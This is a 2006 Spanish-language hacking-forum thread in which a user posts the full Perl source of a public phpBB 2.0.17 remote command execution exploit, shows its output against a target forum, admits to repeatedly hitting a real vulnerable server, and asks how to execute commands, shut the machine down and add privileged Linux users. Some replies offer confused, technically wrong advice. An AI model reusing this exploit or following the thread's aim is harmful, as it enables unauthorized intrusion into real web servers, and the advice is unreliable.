Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Enero 08, 2009, 02:54:46
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u uNSeCure)  |  Tema: Una pregunta sobre Remote command execution exploit 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Una pregunta sobre Remote command execution exploit  (Leído 827 veces)
anonimox
Visitante
« en: ſeptiembre 05, 2006, 10:28:46 »


Holas

Alguien sabe explotar esto? o sea no es compilar y listo. Yo quiero saber como puedo aprobechar esto para conseguir algo.

Despues de ejecutar consigo esto, pero nada no pasa, intente entrar como root sin pass pero no funciona...

Código:
C:\>perl bug17.pl http://forophpbbversion2017/ webmaster ALL = (root) NOPASSWD:
tc/init.d/apache2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User bill23023 successfully registered!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Exploit Original:

Código:
#!/usr/bin/perl

# phpBB <= 2.0.17 remote command execution exploit
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05

use LWP::UserAgent;
use HTTP::Cookies;

if( @ARGV < 2) { usage(); }

head();

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

for($i=0;$i<5;$i++)
 {
  $rand .= int(rand(9)); 
 }

$name     = 'bill'.$rand;
$password = 'r57phpBB2017xpl'.$rand;
$path = $ARGV[0];
$cmd  = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post(
  $path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',

  Content  => [ 
              'username' => $name,
              'email' => $rand.'_bill_gates @microsoft.com',
              'new_password' => $password,
              'password_confirm' => $password,
              'signature' => 'r57:`'.$cmd.'`',
              'viewemail' => '0',
              'hideonline' => '1',
              'notifyreply' => '0',
              'notifypm' => '0',
              'popup_pm' => '0',
              'attachsig' => '0',
              'allowbbcode' => '1',
              'allowhtml' => '1',
              'allowsmilies' => '0',
              'mode' => 'register',
              'agreed' => 'true',
              'coppa' => '0',
              'submit' => 'Submit',
              ],
  );

if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }

$res = $xpl->post(
  $path.'login.php',
  Content  => [
              'username' => $name,
              'password' => $password,
              'redirect' => '',
              'login'    => 'Log in',
              ],Referer => $path.'login.php');

$res = $xpl->get($path.'profile.php?mode=editprofile');
 @content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
for( @content)
 {
 if(/<\/textarea>/) { $p = 0; }
 print $_."\r\n" if $p;
 if(/<textarea name="signature"/){ $p = 1; }
 }
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

sub head()
 {
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC\r\n";   
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 }
 
sub usage()
 {
 head();
 print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
 print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
 print " <cmd>  - Command for execute\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 exit();
 }

# milw0rm.com [2005-12-24]
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2188


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #1 en: ſeptiembre 06, 2006, 12:33:32 »
mmmmmm me huele a troyano..

y si te fijas en e mismo codigo sale user y pass

$name     = 'bill'.$rand;
$password = 'r57phpBB2017xpl'.$rand;

talves te podria servir...
pero me lo detecto malioso... mmmmmmmmmmmmmmmmmmmmmmmmmmmmm  Sad
« Última modificación: ſeptiembre 06, 2006, 12:34:23 por OzX » En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
anonimox
Visitante
« Respuesta #2 en: ſeptiembre 06, 2006, 07:35:31 »
yo no veo ninguna parte malisioso....

$name     = 'bill'.$rand;
$password = 'r57phpBB2017xpl'.$rand;

es el user y pass para registrar un usuario en el foro de la victima..


lo que yo no se, como se usa los comandos que supuestamente se puede ejecutar...
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2188


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #3 en: ſeptiembre 06, 2006, 09:00:22 »
el nod32 me detecto troyano por eso te digo, y no creo que el nod lo invente..
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
ManCuerTex
Visitante
« Respuesta #4 en: ſeptiembre 07, 2006, 01:16:01 »
Cita de: OzX en ſeptiembre 06, 2006, 09:00:22
el nod32 me detecto troyano por eso te digo, y no creo que el nod lo invente..

Si que lo inventa, nod32 y cualquier otro antivirus.


Saludos
En línea
sickness1
Si no robarias a un pobre xq entonces si hackearias a cualquiera?
Colaborador
*****
Desconectado Desconectado

Mensajes: 948

Ya llego... Es el fin al fin!


Ver Perfil
« Respuesta #5 en: ſeptiembre 07, 2006, 03:09:17 »
En línea
anonimox
Visitante
« Respuesta #6 en: ſeptiembre 07, 2006, 06:12:09 »
yo se que crea una cuenta nueva, pero a mi no me importa eso, y no se para que sirve...

xq dice

# phpBB <= 2.0.17 remote command execution exploit


entonces supuestamente puedo ejecutar comandos remotos... pero no me funciona o no se como usarlas...


lei bien el exploit, y hay una parte donde dice

$cmd  = $ARGV[1];

y mas abajo
'signature' => 'r57:`'.$cmd.'`',

nose para que hiso esto....

x cierto estoy creando mas de 15 cuentas en esa pagina por solo probar  Grin Grin Grin Grin
En línea
sickness1
Si no robarias a un pobre xq entonces si hackearias a cualquiera?
Colaborador
*****
Desconectado Desconectado

Mensajes: 948

Ya llego... Es el fin al fin!


Ver Perfil
« Respuesta #7 en: ſeptiembre 07, 2006, 07:51:45 »
Si lo piensas cada vez que estas creando una cuentra estas realizando un remote command exploit... Esto no quiere decir que puedas realizar todos los comandos remotamente, este en si se peude... Te da acceso admin y te da todo, que mas quieres?? Ahora que eres admin no tienes mas que ir a la web y realizar los comandos en la misma web como administrados... SAlu2
En línea
anonimox
Visitante
« Respuesta #8 en: ſeptiembre 07, 2006, 09:35:12 »
Cita de: sickness1 en ſeptiembre 07, 2006, 07:51:45
Si lo piensas cada vez que estas creando una cuentra estas realizando un remote command exploit... Esto no quiere decir que puedas realizar todos los comandos remotamente, este en si se peude... Te da acceso admin y te da todo, que mas quieres?? Ahora que eres admin no tienes mas que ir a la web y realizar los comandos en la misma web como administrados... SAlu2

te equivocas, no se registra como admin. el exploit es realizar una ejecucion de un comando al registrarse....

salu2
En línea
sickness1
Si no robarias a un pobre xq entonces si hackearias a cualquiera?
Colaborador
*****
Desconectado Desconectado

Mensajes: 948

Ya llego... Es el fin al fin!


Ver Perfil
« Respuesta #9 en: ſeptiembre 08, 2006, 03:11:21 »
He estado mirando sobre el exploit y he visto que para que funcione requiere de tener una version 5 cuando la mayoria de los servidores utilizan la 4, ya que es mas estable, el registrar el usuario tiende a funcionar, el register global normalmente esta activado y las magic quotes default viene activado pero puede variar... En conclusion este exploit tiene bastantes limitaciones ya que requiere de unas expecificaciones muy exactas para funcionar y es posible que no te ejecute comandos debido a ello... Salu2
En línea
anonimox
Visitante
« Respuesta #10 en: ſeptiembre 09, 2006, 06:41:04 »
Cita de: sickness1 en ſeptiembre 08, 2006, 03:11:21
He estado mirando sobre el exploit y he visto que para que funcione requiere de tener una version 5 cuando la mayoria de los servidores utilizan la 4, ya que es mas estable, el registrar el usuario tiende a funcionar, el register global normalmente esta activado y las magic quotes default viene activado pero puede variar... En conclusion este exploit tiene bastantes limitaciones ya que requiere de unas expecificaciones muy exactas para funcionar y es posible que no te ejecute comandos debido a ello... Salu2


es cierto lo que decir, pero igual encontre un servidor que es vulnerable a esta tecnica....
pero no estoy consiguiendo nada... o sea que no se usar mejor dicho... :-\

esto es lo que me sale...
En línea
sickness1
Si no robarias a un pobre xq entonces si hackearias a cualquiera?
Colaborador
*****
Desconectado Desconectado

Mensajes: 948

Ya llego... Es el fin al fin!


Ver Perfil
« Respuesta #11 en: ſeptiembre 10, 2006, 06:02:29 »
trata de usar esto
perl r57phpBB2017.pl <path> <cmd>\r\n";

a ver si asi te cambia algo... No se si lo habras hecho ya! Salu2
En línea
anonimox
Visitante
« Respuesta #12 en: ſeptiembre 12, 2006, 05:50:40 »
Cita de: sickness1 en ſeptiembre 10, 2006, 06:02:29
trata de usar esto
perl r57phpBB2017.pl <path> <cmd>\r\n";

a ver si asi te cambia algo... No se si lo habras hecho ya! Salu2


gracias man, pero igual no funk... puede ser que se ejecute pero no sale en la pantalla, alguien me puede dar un comando para apagar la PC en linux? xq el de windows ya lo intente.

salu2
En línea
sickness1
Si no robarias a un pobre xq entonces si hackearias a cualquiera?
Colaborador
*****
Desconectado Desconectado

Mensajes: 948

Ya llego... Es el fin al fin!


Ver Perfil
« Respuesta #13 en: ſeptiembre 13, 2006, 04:51:23 »
Podrias compilar 2 archivos uno con esta linea de commando
if(  @ARGV < 2) { usage(); }

y otra con

if(  @ARGV > 1 ) { usage(); }
Para que utilice la parte de usage(); Que es desde donde se ejecutan los commandos.... Aunq me da la impresion que algo esta fallando en ese programa... Salu2
En línea
anonimox
Visitante
« Respuesta #14 en: ſeptiembre 20, 2006, 06:22:29 »
gracias man x tu respuesta.... Cheesy

pero la verdad que no pasa nada  Embarrassed Embarrassed


salu2
En línea
anonimox
Visitante
« Respuesta #15 en: ſeptiembre 20, 2006, 06:24:02 »
otra pregunta....


como yo podria agregar user en LINUX?  y como cambiar el privilegio de ese user todo en modo consola?

salu2
En línea
K0rl3oN
Miembro
*****
Desconectado Desconectado

Mensajes: 141


Ver Perfil Email
« Respuesta #16 en: ſeptiembre 27, 2006, 11:36:02 »
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u uNSeCure)  |  Tema: Una pregunta sobre Remote command execution exploit « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC